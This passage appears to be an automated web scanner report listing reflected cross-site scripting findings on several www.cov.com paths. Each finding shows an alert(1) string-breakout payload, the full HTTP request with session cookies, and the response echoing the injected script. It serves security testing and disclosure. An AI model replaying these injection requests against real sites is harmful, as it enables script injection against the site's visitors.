= '/balancingworkandfamilylife/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/balancingworkandfamilylife/Diversity.aspx?ec112'-alert(1)-'d654b8e90b6=1';//]]>
...[SNIP]...

4.74. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /bestviewed

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1359; path=/
Set-Cookie: PortletId=1350401; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10955


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Best Viewed</title>
<meta name="language" cont
...[SNIP]...
document.aspnetForm.action = '/bestviewed/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/bestviewed/GeneralPageData.aspx?e18d5'-alert(1)-'b19132c4a4f=1';//]]>
...[SNIP]...

4.75. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /biographies

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1141; path=/
Set-Cookie: PortletId=1132501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 152733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Biographies</title>
<meta name="language" cont
...[SNIP]...
DATA[
document.aspnetForm.action = '/biographies/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/biographies/Search.aspx?c3b19'-alert(1)-'10a178ca3f5=1';//]]>
...[SNIP]...

4.76. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:34:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1151; path=/
Set-Cookie: PortletId=1142501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17851


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Overview</title>
<meta name="langu
...[SNIP]...
.aspnetForm.action = '/diversityoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityoverview/Diversity.aspx?8c748'-alert(1)-'750bc24037f=1';//]]>
...[SNIP]...

4.77. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityupdate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1156; path=/
Set-Cookie: PortletId=1147501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14611


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Diversity Update</title>
<meta nam
...[SNIP]...
ment.aspnetForm.action = '/diversityupdate/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityupdate/Diversity.aspx?c2d31'-alert(1)-'bf8e984b8ec=1';//]]>
...[SNIP]...

4.78. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /extranet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1260; path=/
Set-Cookie: PortletId=1254901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
A[
document.aspnetForm.action = '/extranet/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/extranet/GeneralPageData.aspx?6f529'-alert(1)-'c70c33782c6=1';//]]>
...[SNIP]...

4.79. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /firmoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1144; path=/
Set-Cookie: PortletId=1135501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm Overview</title>
<meta n
...[SNIP]...
ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]>
...[SNIP]...

4.80. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1169; path=/
Set-Cookie: PortletId=1162901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14641


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Women...s Forum</title>
<meta name
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/forum/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/forum/Diversity.aspx?cb6be'-alert(1)-'7a5f32d74e6=1';//]]>
...[SNIP]...

4.81. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /honorsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=1136501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18735


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Honors & Rankings</title>
<meta name="language
...[SNIP]...
ent.aspnetForm.action = '/honorsrankings/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/honorsrankings/AboutSection.aspx?f4088'-alert(1)-'6fb7096a36d=1';//]]>
...[SNIP]...

4.82. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /leadersindiversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1152; path=/
Set-Cookie: PortletId=1143501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14970


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Leaders in Diversity</title>
<meta
...[SNIP]...
spnetForm.action = '/leadersindiversity/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/leadersindiversity/Diversity.aspx?1cac5'-alert(1)-'90719ebe248=1';//]]>
...[SNIP]...

4.83. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /legalnotices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

